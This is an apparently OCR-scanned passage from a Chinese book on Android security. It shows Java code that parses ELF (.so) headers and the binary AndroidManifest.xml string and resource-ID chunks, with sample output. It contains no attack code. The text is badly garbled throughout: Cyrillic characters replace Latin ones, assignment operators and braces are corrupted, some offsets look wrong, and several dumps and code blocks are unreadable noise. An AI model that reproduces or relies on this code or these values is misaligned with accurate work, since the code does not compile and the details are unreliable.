上 面 介 绍 了 ELF 文 件 格式 资料 、 解 析 ELF 文 件 的 工具 ， 下 面 融 来 实际 操作 一 下 ， 用 Java 代 码 动 手 解析 一 个 libhello-jni.so 文 
件 。 这 个 libhello-jni.so 文 件 可 以 下 载 。 


提示 : libhello-jni.so 下 载 地 址 : 
http://download.csdn.net/detail/jiangwei0910410003/9204087 
1. 定 义 ELF 文 件 中 各 个 结构 体内 容 
这 需要 参考 elf.h 这 个 头 文件 的 格式 ， 这 个 文件 企 Android 源 码 目录 中 : 
\external\kernel-headers\original\asm-x86\elf.h 
Ее ҺУН УАУ АНУ, SEIOISSET E ERBJ rh FH PAMAT. 
有 了 结构 定义 ， 下 面 就 来 看 看 如 何 解析 吧 。 在 解析 之 前 需要 将 so 文件 读 取 到 byte[] 中 ， 定 义 一 个 数据 结构 类 型 : 


public static ElfType32 type 32 = new ElfType32(); 


byte[] fileByteArys - Utils.readFile("so/libhello-jni.so"); 
if(fileByteArys == пи11) { 

System.out.println("read file byte failed..."); 

return; 


2. 解 析 ELF 文 件 的 头 部 信息 


文件 的 最 开始 几 个 字 书 给 出 如 何 解释 文件 的 提示 信息 。 这 些 信息 独立 于 处 理 器 ， 也 独立 于 文件 中 的 其 余 内 容 。ELF 头 部 信息 
数据 结构 如 下 表示 : 


#define EI NIDENT 16 
typedef struct( 


unsigned char e ident[EI NIDENT]; 
ELf32 Half е type; 
Elf32 Half е machine; 


Е1#32 Word е version; 
Е1#32 Addr е entry; 
ElIT32. OTE e phoff; 
ElIf32 Off e shoff; 


ELf32 Word е flags; 
Е1#32 Half е ehsize; 
Е1#32 Half е phentsize; 
ELf32 Half е phnum; 
Elf32 Half е shentsize; 
EIf32 Half е shnum; 
Elf32 Half е shstrndx; 


)Elf32 Ehdr; 


这 里 介绍 几 个 重要 的 字段 ， 后 面 修改 so 文件 的 时 候 也 会 用 到 : 


e phoff: 是 程序 头 〈Program Header) 内 容 在 整个 文件 的 偏 移 值 ， 可 以 用 这 个 偏 移 值 来 定位 程序 头 的 开始 位 置 ， 用 于 解析 


е shoff: 是 段 头 (Section Header) 内 容 在 这 个 文件 的 偏 移 值 ， 可 以 用 这 个 偏 移 值 来 定位 段 头 的 开始 位 置 ， 用 于 解析 段 头 信 


(m 
о 


' e phnum: 是 程序 头 的 个 数 。 


е shnum: 是 段 头 的 个 数 。 


' e_shstrndx: 是 Stting 段 在 整个 段 列 表 中 的 索引 值 ， 用 于 后 面 定位 Stting 段 的 位 置 。 


参 


照 图 4-1 可 以 很 容易 解析 下 面 代码 : 


/** 
х 解析 ELF 的 头 部 信息 
* @рагаш header 
"s 
private static void рагѕенНеааег (руёе[] header, int offset)t 
if(header -- пи11){ 
System.out.println("header is null"); 
return; 
} 
type 32.hdr.e ident = Utils.copyBytes(header, 0, 16);// J 2 
type 32.hdr.e type = Utils.copyBytes(header, 16, 2); 
type 32.hdr.e machine - Utils.copyBytes(header, 18, 2); 
type 32.hdr.e version - Utils.copyBytes(header, 20, 4); 


type 32.hdr.e entry - Utils.copyBytes(header, 24, 


~ 


4 
type_32.hdr.e_phoff = Utils.copyBytes (header, 28, 4 
type_32.hdr.e_shoff = Utils.copyBytes (header, 32, 4 

4 


type 32.hdr.e flags = Utils.copyBytes(header, 36, 
type 32.hdr.e ehsize = Utils.copyBytes(header, 40, 
type 32.hdr.e phentsize - Utils.copyBytes(header, 42, 2); 
type 32.hdr.e phnum = Utils.copyBytes(header, 44,2); 

type 32.hdr.e shentsize = Utils.copyBytes(header, 40,2); 
type 32.hdr.e shnum = Utils.copyBytes(header, 48, 2); 

type 32.hdr.e shstrndx - Utils.copyBytes (header, 50, 2); 


按照 对 应 的 每 个 字段 的 字 书 个 数 ， 读 取 字 书 融 可 以 了 。 
3. 解 析 段 头 信息 


每 个 段 头 部 可 以 用 如 下 数据 结构 摘 述 : 


typedef struct{ 
Elf32_Word sh name; 
Е1#32 Word sh type; 
EIf32 Word sh flags; 
Elf32 Addr sh ааах; 
EIf32 Off sh offset; 
Е1#32 Word sh, size; 
EIlf32 Word sh link; 
Е1#32 Word sh, info; 
Е1#32 Word sh addralign; 
Е1#32 Word sh, entsize; 

FHELT3SA2. SHIT; 


这 个 结构 中 字段 就 不 做 解释 了 。 后 面 会 手动 构造 这 样 一 个 数据 结构 ， 到 时 候 再 详细 说 明 每 个 字段 含义 。 


су 


文 照 这 个 结构 ， 解 析 也 简单 了 : 


/** 
РИ 


X 
` 


AM 


public static void parseSectionHeaderList(byte[] header, int offset)(í 
int header size = 40;//40 € d 
int header count = Utils.byte2Short(type 32.hdr.e shnum);// 头 部 的 个 数 


byte[] des 


new byte[header size]; 


for(int i2z0;i«header. count;i-«-«)( 
System.arraycopy (header, i*header size + offset, des, 0, header. size); 
type 32.shdrList.add(parseSectionHeader(des)); 


private static elf32 shdr parseSectionHeader(byte[] header)( 
ElfType32.elf32. shdr shdr = new ElfType32.e1f32. shdr(); 


shdr.sh name = Utils.copyBytes(header, 0, 4) 

shdr.sh type - Utils.copyBytes(header, 4, 4); 

shdr.sh flags = Utils.copyBytes(header, 8, 4); 
4) 


, 


shdr.sh addr = Utils.copyBytes(header, 12, ; 
shdr.sh offset = Utils.copyBytes(header, 16, 4); 


shdr.sh size - Utils.copyBytes(header, 20, 4) 
shdr.sh link = Utils.copyBytes (header, 24, 4) 
shdr.sh info - Utils.copyBytes(header, 28, 4) 
shdr.sh addralign = Utils.copyBytes(header, 32, 
shdr.sh entsize - Utils.copyBytes(header, 36, 4); 
return shdr; 


这 里 需要 注意 的 是 ， 看 到 的 SectionHeade[ 一 般 都 是 多 个 的 ， 所 以 这 里 用 一 个 List 集 合 来 保存 。 


4. 解 析 程 序 头 信息 


可 执行 文件 或 者 共享 目标 文件 的 程序 头 部 是 一 个 结构 数组 ， 每 个 结构 描述 了 一 个 段 或 者 系统 准备 程序 执行 所 必需 的 其 他 信 
恩 。 目 标 文 件 的 “ 段 ” 包 侣 一 个 或 者 多 个 “ 节 区 ”， 也 融 是 “ 段 内 容 ” (Segment Contents) 。 程 序 头 部 仅 对 可 执行 文件 和 共 
享 目标 文件 有 意义 。 可 执行 目标 文件 在 ELF 头 部 的 e phentsize 和 e_phnum 成 员 中 给 出 其 目 身 程 序 头 部 的 大 小 。 


程序 头 部 的 数据 结构 如 下 : 


typedef struct { 


Elf32. Word 
ыза OLT 
Elf32 Addr 
EIf32 Addr 
Elf32, Word 
Elf32 Word 
Elf32. Word 
Elf32. Word 
F EIIJA2 phdr:; 


p. type; 

p. offset; 
p. vaddr; 
p. paddr; 
p filesz; 
p. memsz; 
p flags; 
p align; 


按照 这 个 结构 来 进行 解析 ， 如 下 所 示 : 


/** 
* 解析 程序 头 信息 
* @рагаш header 
*J 
public static void parseProgramHeaderList(byte[] header, int offset)(í 
int header size = 32;//32^* 4 
int header count = Utils.byte2Short(type 32.hdr.e phnum);// 头 部 的 个 数 
byte[] des = new byte[header. size]; 
for (int i-z0;i«header count;i-«-«)í( 
System.arraycopy (header, i*header size + offset, des, 0, header. size); 
type 32.phdrList.add(parseProgramHeader (des)); 


private static elf32 phdr parseProgramHeader(byte[] header)(í 

ElfType32.e1f32. phdr phdr = new ElfType32.e1f32 phdr(); 

phdr.p type = Utils.copyBytes(header, 0, 4); 

phdr.p offset - Utils.copyBytes(header, 4, 4); 

phdr.p vaddr = Utils.copyBytes(header, 8, 4); 

phdr.p paddr = Utils.copyBytes(header, 12, 4); 

phdr.p filesz = Utils.copyBytes (header, 16, 4); 

phdr.p memsz - Utils.copyBytes(header, 20, 4) 
header, 24, 4) 
header, 28, 4) 


phdr.p flags = Utils.copyBytes 
phdr.p align = Utils.copyBytes 
return phdr; 


( 
( 


当然 还 有 其 他 结构 的 解析 工作 ， 这 里 丈 不 一 一 介绍 了 ， 因 为 这 些 结构 在 后 面 的 介绍 中 不 会 用 到 ， 这 里 只 需 了 解 一 下 。 


44 ”验证 解析 结果 


解析 工作 做 完了 ， 为 了 验证 解析 工作 是 否 正 确 ， 需 要 给 每 个 结构 定义 打印 消 数 ， 也 束 是 重 写 toString 方 法 即 可 ， 如 下 所 示 : 


mi Problems tm Javadoc [i Declaration «5 Search [zl] Console 52 XB LogCat 
zterminated > ParseSo [Java Application] CAProgram FilesyJavaNre7binNjavaw 
十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 EJ 不 Неайег+++++++++++++++++ 
header: 

magic:880 OB OO OO ӨӨ OO ве OO OO O1 O1 O1 46 4с 45 
e type:O8g 03 

e machine:860 28 

e version:880 ӨӨ ӨӨ 01 

e entry:O OO OO өө 

e phoff:88 ӨӨ 8080 34 

e shoff:88 880 31 38 

e flags:805 ӨӨ ӨӨ ӨӨ 

e ehsize:00 34 

e phentsize:00 20 

e phnum:88 87 

e shentsize:800 28 

e shnum:88 15 

e shstrndx:00 14 


+++++++++++++++++++Ргоргат Неайег+++++++++++++++++ 


The 1 Program Header: 

p Туре: дө өө OG 

p offset:8080 ва ве 34 

p vaddr:88 00 өе 34 

p paddr:8a aa ae 34 

p filesz:800 00 ӨӨ ffffffeo 
p memsz:00 a8 ӨӨ 十 十 十 十 十 十 日 
p 十 1]ags:6g ӨӨ 66 04 
p_align:890 00 00 од 


然后 再 使 用 readelf 工 具 来 查看 so 文件 的 各 个 结构 内 容 ， 对 比 就 可 以 知道 解析 是 否 成 功 了 。 


提示 : 解析 代码 下 载 地 址 : https:/ /etthub.com/fourbrother/parse_androidso 


45 ”本章 小 结 


本 章 主 要 介绍 了 Android 中 的 so 文件 格式 解析 内 容 ， 了 解 so 文 件 格 式 ， 对 应 用 安全 防护 和 逆向 应 用 都 有 很 重要 的 意义 。 比 如 ， 
现在 为 了 应 用 的 安全 ， 可 以 对 so 文件 进行 加 密 操 作 ， 这 就 需要 对 so 文件 格式 有 非常 深入 的 了 解 ， 在 逆向 应 用 的 时 候 ， 碰 到 so 加 
混淆 时 ， 可 以 分 析 so 文 件 格式 来 确定 哪 一 块 数据 结构 被 加 宅 和 防护 了 ， 从 而 更 深入 地 分 析 问 题 和 解决 问题 。 


第 5 章 AndroidManifest.xml 文 件 格式 解析 


本 章 介绍 Android 的 AndroidManifest.xml 文 件 格 式 的 内 容 。 为 什么 要 介绍 这 个 内 容 呢 ?在 应 用 安全 防护 中 ， 可 以 利用 对 应 用 的 
AndroidManifest.xml 文 件 做 混 消 ， 从 而 达到 安全 防护 功能 ， 同 时 在 做 逆向 分 析 的 时 候 ， 为 了 能 够 反 编 译 成 功 ， 有 时 候 必 须要 了 解 


AndtoidManifest.xml 文 件 格式 ， 需 要 进行 文件 修复 才 可 行 。 


5.1 格式 分 析 


和 下 移 来 脑 补 一 个 知识 点 ，Android 中 的 apk 程 序 其 实 残 是 一 个 压缩 包 ， 可 以 用 压缩 软件 进行 解压 的 ， 如 图 5-1 所 示 。 


? lib 

Jj META-INF 

(res 

се AndroidManitest.xm| 


classes.dex 
Lom 


= 
———— 


图 5-1  apk/& 28 @, 


可 以 看 到 这 里 有 三 个 文件 : AndroidManifest.xml、classes.dex、resources.arsc， 这 三 个 文件 都 非常 重要 ， 本 章 介 绍 第 一 
个 文件 ， 后 续 两 章 分 析 后 两 个 文件 。 


只 要 反 编 译 过 apk 的 人 都 知道 apktool 工 具 的 工作 原理 就 是 解析 这 三 个 文件 格式 。 因 为 Android 在 编译 成 apk 之 后 ， 这 个 文件 


有 目 己 的 格式 ， 用 普通 文本 格式 打开 的 话 是 乱码 ， 所 以 需要 解析 成 能 看 伐 的 内 容 。 融 像 前 一 章 解析 so 文件 一 样 。 


既然 编译 成 apk 之 后 格式 变 了 ， 那 么 就 说 明 谷歌 给 AndroidManifest 定 义 了 一 种 文件 格式 ， 只 要 知道 这 种 格式 的 话 ， 就 可 以 
详细 地 解析 这 个 文件 了 ， 如 图 5-2 所 示 。 


这 张 图 详细 解析 了 AndroidManifest.xml 文 件 的 格式 ， 但 是 光 看 这 张 图 可 能 印象 不 深 ， 所 以 要 结合 一 个 案例 来 解析 一 个 文 
件 ， 才 能 理解 透彻 。 下 面 束 用 一 个 案例 来 解析 一 下 吧 。 


随便 找 一 个 简单 的 apk， 用 压缩 文件 打开 ， 解 压 出 AndroidManifest.xml 就 可 以 了 ， 然 后 开始 读 取 内 容 进 行 解 析 。 


Chunk Size 


Binary AndroidManitest Роты -5 MindMac 
x 


Binary AndroidManifest. xml 


Abytes 


图 5-2 Android Mainfest.xml KRA ( 见 书后 彩 图 ) 


5.2 格式 解析 


通过 前 一 节 的 格式 分 析 ， 大 致知 道 了 编译 之 后 的 AndroidManifest.xml 文 件 格式 ， 本 节 通 过 代码 案例 来 详细 解析 文件 中 的 各 


5.21 解析 头 部 信息 


任何 一 个 文件 格式 都 会 有 头 部 信息 ， 而 且 头 部 信息 也 很 重要 ， 同 时 ， 头 部 一 般 都 有 固定 格式 头 部 信息 还 有 以 下 这 些 字段 信 


CI 


1) 文件 魔 数 : 四 个 字 节 。 


2) 文件 大 小 : ШЕТ. 


下 面 惑 开始 解析 所 有 的 字段 Chunk 内 容 了 ， 其 实 每 个 Chunk 的 内 容 都 有 一 个 相似 点 ， 融 是 头 部 信息 : ChunkType (四 个 字 
+) 和 ChunkSize (四 个 字 节 ) 。 


5.2.2 解析 String Chunk 


String Chunk 主 要 用 于 存放 AndroidManifest 文 件 中 所 有 的 字符 串 信 息 ， 如 图 5-3 所 示 。 


识 明 如 下 : 


: ChunkType: StringChunk 的 类 型 ， 


: ChunkSize: StringChunk 的 大 小 ， 四 


: StringCount: 


: StyleCount: 


: Unknown: 位 置 区 域 ， 四 个 字 节 


: StringPoolOffset: 


: StylePoolOffset: 


: StringOffsets: 


: SytleOffsets:. 每 个 样式 的 偏 移 值 ， 


Еа 


字符 串 内 容 和 样式 内 容 了 。 


每 个 字符 串 的 偏 移 值 ， 


定 四 个 字 节 : 0x001C0001。 


‚> 


ЕЖЕ 

SttingChunk 中 字符 串 的 个 数 ， 四 个 字 节 。 

StringChunk 中 样式 的 个 数 ， 四 个 字 节 ,但 是 在 实际 解析 过 程 中 ， 这 个 值 一 直 是 0x00000000。 
， 在 解析 的 过 程 中 ， 这 里 需要 略 过 四 个 字 节 。 

字符 串 池 的 偏 移 值 ， 四 个 字 节 ， 这 个 偏 移 值 是 相对 于 SttingChunk 的 头 部 位 置 。 


样式 池 的 偏 移 值 ， 四 个 字 节 ， 这 里 没有 Style， 所 以 这 个 字段 可 忽略 。 


它 的 大 小 应 该 是 StrineCount*4 个 字 节 。 


它 的 大 小 应 该 是 SytleCount*4 个 字 节 。 


图 5-3 String Chunk 结 构 


下 面 介绍 代码 ， 由 于 代码 的 篇 幅 有 点 长 ， 所 以 这 里 分 段 说 明 。 后 面 会 给 出 整个 项 目 代 码 下 载 地 址 的 。 


1) 首先 需要 把 AndroidManifest.xml 文 件 读 入 到 一 个 byte 数 组 中 : 


byte[] byteSrc = null; 
FilelnputStream fis = null; 
ByteArrayOutputStream bos = null; 
ry 
fis = new FileInputStream("xmltest/AndroidManifestl.xml"); 
bos - new ByteArrayOutputStream(); 
byte[] buffer = new byte[1024]; 
int len = 0; 
while((len-fis.read(buffer)) !- -1) { 
bos.write(buffer, 0, len); 
} 
byteSrc = bos.toByteArray(); 
)catch(Exception е){ 
System.out.println("parse xml error:"-«e.toString()); 
)f£inallyv( 
Сгу { 
fis.close(); 
bos.close(); 
}catch (Exception e){ 


2) 下 面 来 解析 头 部 信息 : 


/** 


* 解析 XML 的 头 部 信息 
* @param byteSrc 


“ү 
public static void parseXmlHeader(byte[] byteSrc)t 
byte[] xmlMagic = Utils.copyByte(byteSrc, 0, 4); 
System.out.println("magic number:"+Utils.bytesToHexString(xmlMagic)); 
byte[] xmlSize = Utils.copyByte (byteSrc, 4, 4); 
System.out.println("xml size:"-«Utils.bytesToHexString(xmlSize)); 


xmlSb.append("«?xml version=\"1.0\" encoding=\"utf-8\"?>"); 
xmlSb.append("Nn"); 


按照 上 面 说 的 格式 解析 即 可 : 


Parse XML Header------------ 
magic number:08 O8 ӨӨ ӨЗ 
xml size;:00 00 123 dÜ 


3) 解析 StringChunk 信 息 : 


/** 
* 解析 StringChunk 
х (àparam byteSrc 
"y 
public static void parseStringChunk(byte[] byteSrc)t 
//String Chunk 的 标示 
byte[] chunkTagByte - Utils.copyByte(byteSrc, stringChunkOffset, 4); 
System.out.println("string chunktag:"«Utils.bytesToHexString(chunkTagByte)); 
//String Size 
byte[] chunkSizeByte = Utils.copyByte(byteSrc, 12, 4); 
//System.out.println(Utils.bytesToHexString(chunkSizeByte)); 
int chunkSize - Utils.byte2int(chunkSizeByte); 
System.out.println("chunk size:"-«chunkSize); 
//String Count 
byte[] chunkStringCountByte - Utils.copyByte(byteSrc, 16, 4); 
int chunkStringCount = Utils.byte2int(chunkStringCountByte); 
System.out.println("count:"-«chunkStringCount); 


stringContentList - new ArrayList«String»(chunkStringCount); 


// 这 里 需要 注意 的 是 ， 后 面 的 四 个 字 节 是 Style 的 内 容 ， 然 后 紧 接着 的 四 个 字 节 始终 是 0， 
// 所 以 我 们 需要 直接 过 滤 这 8 个 字 节 

//String Offset 相对 于 String Chunk 的 起 始 位 置 0x00000008 

byte[] chunkStringOffsetByte = Utils.copyByte(byteSrc, 28, 4); 


int stringContentStart = 8 + Utils.byte2int(chunkStringOffsetByte); 
System.out.println("start:"+stringContentStart); 


//String Content 
byte[] chunkStringContentByte = Utils.copyByte(byteSrc, stringContentStart, 
chunkSize); 


/* 在 解析 字符 串 的 时 候 有 个 问题 ， 就 是 编码 : UTF-8 Яп UTF-16, #Ж E UTF-8 则 以 00 结尾 ; 如 果 是 
UTF-16 则 以 00 00 结尾。 此 处 代码 是 用 来 解析 AndroidManifest .xml 文件 的 */ 

// 这 里 的 格式 是 : 偏 移 值 开始 的 两 个 字 节 是 字符 串 的 长 度 ， 接 着 是 字符 串 的 内 容 ， 后 面 

// 跟着 两 个 字符 串 的 结束 符 00 

byte[] firstStringSizeByte = Utils.copyByte(chunkStringContentByte, 0, 2); 


// 一 个 字符 对 应 两 个 字 节 
int firstStringSize = Utils.byte2Short(firstStringSizeByte)*2; 
System.out.println("size:"-«firstStringSize); 
byte[] firstStringContentByte - Utils.copyByte(chunkStringContentByte, 2, 
firstStringSize-s2); 
String firstStringContent = new String(firstStringContentByte); 
stringContentList.add(Utils.filterStringNull(firstStringContent)); 
System.out.println("first string:"«Utils.filterStringNull(firstStringCon 
tent)); 


/ / 将 字符 串 都 放 到 ArrayList 中 
int endStringIndex = 2+firstStringSize+2; 
while(stringContentList.size() < chunkStringCount)t 
// 一 个 字符 对 应 两 个 字 节 ， 所 以 要 乘 以 2 
int stringSize = 

Utils.byte2Short (Utils.copyByte( 

chunkStringContentByte, endStringIndex, 2))*2; 
obrana SEP = 

new String(Utils.copyByte( 

chunkStringContentByte, endStringIndex-2, stringSize-42)); 
System.out.println("str:"«Utils.filterStringNull(str)); 
stringContentList.add(Utils.filterStringNull(str)); 
endStringlIndex += (2-«stringSize-2); 
} 
resourceChunkOffset = stringChunkOffset + Utils.byte2int (chunkSizeByte); 


这 里 需要 解释 几 点 : 

1) 在 上 面 的 格式 说 明 中 ， 有 一 个 Unknow 字 段 ， 四 个 字 节 ， 所 以 需要 略 过 。 
2) 在 解析 字符 串 内 容 的 时 候 ， 字 符 串 内 容 的 结束 符 是 0x0000。 

3) 每 个 字符 串 开始 的 前 两 个 字 节 是 字符 串 的 长 度 。 


有 了 每 个 字符 串 的 偏 移 值 和 大小， 那么 解析 字符 串 内 容 束 简单 了 ， 如 下 所 示 : 


TER 


г ш 


可 以 看 到 0x000B (高 位 和 低位 相反 ) 融 是 字符 串 的 大 小 ， 结 尾 是 0x0000: 


f[** 
* 在 解析 字符 串 的 时 候 有 个 问题 ， 就 是 编码 : ОТР -人 和 UTF -16 ,如 果 是 UTF - Зат ӨӨ 8). 如 果 是 UTF -二 6 的 话 以 BB GOREH 


[** 
* pWOMERERB:3EgHTAndroidManifest.xmls[f8 
"| 
/ / 这 里 的 格式 是 : — ЫШ TEX раді 接着 是 字 衬 串 的 内 容 ; Ie iE ЕВА ТА 190 
аш и l l LI LZ T = ата Таа иаа. COBLCoLeD yte, 8, 2): 


/7 一 个 字符 对 应 两 个 字 节 


int ua ааа = Utils. Ax i Sad „най Е 


чер firstStri ECOHEERÉ = - Utils. u————————" 2, firststring5ize-*2); 
String firstStringContent = new String(firstStringContentByte); 
stringContentlist.add(Utils.filterstringNull(finrststringContent)); 


System.out.println("first string: «Utils.jilter$tringNull(firstStringContent)); 


/ ПЕЕВ ArrayList 

int endStringIndex = 2+firstsString5ize+2; 

while(stringContentLlist.size() < chunkStringCount)í 
/ 一 个 字符 对 应 两 个 字 节 ， 所 以 要 乘 以 之 
int stringSize = Utils.byte2Short(Utils.copyByte(chunkStringContentByte, endstringIndex, 2))*2; 
String str = new String(Utils.copyByte(chunkStringContentByte, endStringIndex+2, stringSize+2)); 
System.out.println("str:"+Utils.filterStringNull(str)); 
stringContentlist.add(Utils.filterstringNull(str)); 
endStringIndex += (2*stringSize-*2); 


} 
int stringSize = Utils.byte2Short(Utils.copyByte(chunkStringContentByte, endStringIndex, 2))*2; 
String str = new String(Utils.copyByte(chunkStringContentByte, endStringIndex+2, stringSize+2)); 
System.out.println("str:"+Utils.filterStringNull(str)); 
stringContentlist.add(Utils.filterStringNull(str)); 
endStringIndex += (2*4stringSize-*2); 

} 


一 个 字符 对 应 的 是 两 个 字 节 ， 而 且 这 里 有 一 个 方法 : 


public static String filterStringNull(String str)í 
if(str == null [| str.length() == 0) { 
return str; 
} 
byte[] strByte = str.getBytes(); 
ArrayList«Byte» newByte = new ArrayList«Byte»(); 
for(int i2z0;i«strByte.length;i-«-«)(í( 
if(strByte[i] != 0){ 
newByte.add(strByte[i]); 


} 

byte[] newByteAry = new byte[newByte.size()]; 

for(int i=0;i<newByteAry.length; i1+-+) { 
newByteAry[i] = newByte.get(i); 

} 


return new Strimng(newByteAry); 


逻辑 束 是 过 滤 空 字符 串 : 在 C 语 言 中 是 NULL， 在 Java 语 言 中 残 是 00， 如 果 不 过 滤 的 话 ， 会 出 现下 面 的 这 种 情 


Parse String Chunk------------- 
string chunktag:00 1с 00 01 
chunk size:2580 


count : 52 


ѕіагі : 244 
size:22 
first 


str: 
str: 
str: 
str: 
str: 
str: 
str: 
str: 
str: 
str: 
str: 
str: 
str: 
str: 
str: 
str: 


= @ Ú ñ m O. rf F P. а з < 
+ 3 г O x FWO г F -íotr 
ба 3 3 G Cm CO оза 


string:versionCode 


Ф 
б 


|ы 
Ф 


nr 


mi, REA, 


sionName 


e 
SdkVenrsion 

owBackup 

n 

el 

me 

uggable 

опе а 

figCh nges 

eenOrientation 

roid 
p://schemas.android.com/apk/res/android 
kage 

tformBuildVenrsioncCode 


符 后 面 多 了 一 个 00， 所 以 过 渡 之 后 残 可 以 了 ， 如 下 所 示 : 


An 
En 
DH 
RI 
dr 
-> 
A 


Parse String Chunk------------- 
string chunktag:00 1c 00 01 
chunk size:2580 

count : 52 


start : 244 
ѕіғе: 22] 


first string:versionCode 


str:versionN 
str:name 
str:minSdkVe 
str:allowBac 
str:icon 
str:label 
str:theme 
str:debuggab 
str:exported 
str:configCh 
str:screenOr 
str:android 
str: 
str: 
str: 
str: 
str: 
str: 
str: 
str: 
str: 
str: 
str: 
str: 
str: 
str: 
str: 
str: 
str: 
str: 
str: 
str: 


package 


manifest 
com.qq.e 
у | 

21 

5.0.1-16 
uses-per 
android. 
android. 
android. 
android. 
android. 
android. 
android. 
uses-sdk 
applicat 


上 面 解析 了 AndroidManifest.xml 中 所 有 的 字符 串 内 容 。 这 里 需 


ате 


rsion 
kup 


le 


anges 
lentation 


. demo 


24448 
mission 


permission. 
permission. 
.ACCESS WIFI STATE 


permission 


permission. 
.АССЕ55 COARSE LOCATION 
.АССЕ55 COARSE UPDATES 

-WRITE EXTERNAL STORAGE 


permission 
permission 
permission 


ion 


系 引 来 获取 这 些 字 符 串 的 值 。 


5.23 ”解析 Resourceld Chunk 


platformBuildVersionCode 
platformBuildVersionName 


INTERNET 
ACCESS NETWORK STATE 


READ PHONE STATE 


http: //schemas.android.com/apk/res/android 


用 一 个 全 局 的 字符 列表 来 仓储 


x E= 


== 


FERJE, BARA 


Resourceld Chunk 主 要 是 用 来 人 存放 AndroidManifest 中 用 到 的 系统 属性 值 对 应 的 人 资源 ID， 如 图 5-4 所 示 ， 比 如 android : 


versionCode 中 的 versionCode 属 性 ，androlid 是 前 缀 ， 


后 


A. 


图 5-4 Resourceld Chunk 结 构 


: ChunkType: ResoutceId Chunk 的 类 型 , X vg 4 £ P 0x00080108, 
: ChunkSize: Resourceld Chunk 的 大 小 ， 四 个 字 节 。 


: Resourcelds: Resourceld 的 内 容 ， 这 里 大 小 是 Resourceld Chunk 大 小 除 以 4， 减 去 头 部 的 大 小 8 个 字 节 (ChunkType 和 
ChunkSize) ° 


解析 代码 如 下 : 


/** 
х 解析 Resource Chunk 
* (param byteSrc 
"y 
public static void parseResourceChunk(byte[] byteSrc)t 
byte[] chunkTagByte = Utils.copyvByte(byteSrc, resourceChunkOffset, 4); 
System.out.println(Utils.bytesToHexString(chunkTagByte)); 
byte[] chunkSizeByte = Utils.copyByte(byteSrc, resourceChunkOffset-«4, 4); 
int chunkSize = Utils.byte2int (chunkSizeByte); 
System.out.println("chunk size:"-«chunkSize); 


// 这 里 需要 注意 的 是 chunkSize 是 包含 了 
/ /chunkTag 和 chunkSize 议 两 个 字 节 的 ， 所 以 需要 剔除 
byte[] resourceldByte = Utils.copyByte(byteSrc, resourceChunkOffset+8, 
chunkSize-8); 
ArrayList«Integer» resourceldList = new ArrayList«Integer»(resourceIdByte. 
length/4); 
for(int i20;i«resourceIdByte.length;i-«-4)( 
int resId = Utils.byte2int(Utils.copyByte(resourcelIdByte, i, 4)); 
System.out.println("id:"«resId-«",hex:"-« 
Utils.bytesToHexString(Utils.copyByte(resourceldByte, 1, 4))); 
resourceIdList.add(resId); 
} 


nextChunkOffset = {resourceChunkOffset+chunkSize): 


解析 结果 如 下 : 


Раг<е Ке<оигсе СһипК------------ 
00 08 01 80 

chunk size:56 
1d:16843291,hex:01 01 02 1b 
1d:16843292,hex:01 01 02 1c 
1d:16842755,hex:01 01 00 03 
1d:16843276,hex:01 01 02 Өс 
1d:16843392,hex:01 01 02 80 
1d:16842754,hex:01 01 ӨӨ 02 
1d:16842753,hex:01 01 00 01 
1d:16842752,hex:01 01 00 00 
1d:16842767,hex:01 01 ӨӨ ef 
1d:16842768,hex:01 01 00 10 
1d:16842783,hex:01 01 ӨӨ 1f 
1d:16842782,hex:01 01 00 1e 


这 里 解析 出 来 的 ID 到 底 是 什么 呢 ? 


Android 中 的 ID 值 


在 写 Android 程 序 的 时 候 ， 都 会 发 现 有 一 个 R 文 件 ， 那 里 面 存放 着 每 个 资源 对 应 的 ID， 那 么 这 些 ID 值 是 怎么 得 到 的 呢 ? 


Package ID 相 当 于 一 个 命名 空间 ， 限 定 资源 的 来 源 。Android 系 统 当 前 定义 了 两 个 资源 命令 空间 ， 其 中 一 个 是 系统 资源 命令 空 
间 ， 其 Package ID 等 于 0x01; 另外 一 个 是 应 用 程序 资源 命令 空间 ， 其 Package ID 等 于 0x7f。 所 有 位 于 [0x01，0x7 自 之 间 的 Package ID 
都 是 合法 的 ， 而 在 这 个 范围 之 外 的 都 是 非法 的 。 前 面 提 到 的 系统 资源 包 package-expott.apk 的 Package ID 就 等 于 0x01， 而 在 应 用 程序 
中 定义 的 资源 Package ID 的 值 都 等 于 0x7f， 这 一 点 可 以 通过 生成 的 R.java 文 件 来 验证 。 


Type ID 是 指 资源 的 类 型 ID。 资 源 的 类 型 有 animatotr、anim、color、drawable、layout、menu、fraw、 string 和 xml 等 若干 种 ， 每 一 


种 都 会 被 赋予 一 个 I1D。 


Entry ID 是 指 每 一 个 资源 在 其 所 属 的 资源 类 型 中 所 出 现 的 次 序 。 注 意 ， 不 同类 型 的 资源 的 Entty ID 有 可 能 是 相同 的 ， 但 是 由 
于 它们 的 类 型 不 同 ， 仍 然 可 以 通过 其 资源 ID 区 别 开 来 。 


关于 资源 ID 的 更 多 描述 ， 以 及 资源 的 引用 关系 ， 可 以 参考 ftamewotks/base/libs/]utils A R F README x £F. 


可 以 得 知 系统 资源 对 应 ID 的 XML 文件 在 这 里 : ftamewotksNbaseNcoteNtesNtesNvaluesN\public.xzml ， 代 码 如 下 : 


«eat-comment /> 


«public 
+public 
«public 
«public 
«public 
«public 
«public 
«public 
«public 
«public 
«public 
«public 
«public 
«public 
«public 
«public 
«public 
«public 
«public 
«public 
«public 
«public 


type-"attr" 
type-"attr" 
type-"attr" 
type-"attr" 
type-"attr" 
type-"attr" 
type-"attr" 
type-"attr" 
type-"attr" 
type-"attr" 
type-"attr" 
type-"attr" 
type-"attr" 
type-"attr" 
type-"attr" 
type-"attr" 
type-"attr" 
type-"attr" 
type-"attr" 
type-"attr" 
type-"attr" 
type-"attr" 


1 9=" 0х01010000" 
id=" 0х01010001 " 
name—"icon" 14=" 0х01010002" 
name="name" id-—-"DO0x01010003" 
name-"manageSpaceAoctivity" 
name—"allowClearUserData" id=" 0x01010005" 
name=" permission" id=" 0x01010006" /> 
name-"readPermission" id=" 0х01010007" 
name="writePermission" id-"üxD01010008" 
name-—"protectionLevel" id=" 0к01010009" 
name—"permissionGroup" id=" 0x0101000a" 
name=" sharedUserId" id-")0x0101000b" /> 
name-"hasCode" id-")0x0101000ec" /> 
name-—-"persistent" id=" 0x0101000d" 
name=" enabled" id=" 0x0101000e" /> 
name-"debuggable" id-"O0xD01010D00f" 
name-"exported" id-"0x01010010" f> 
name-"process" id-"0x01010011" /- 
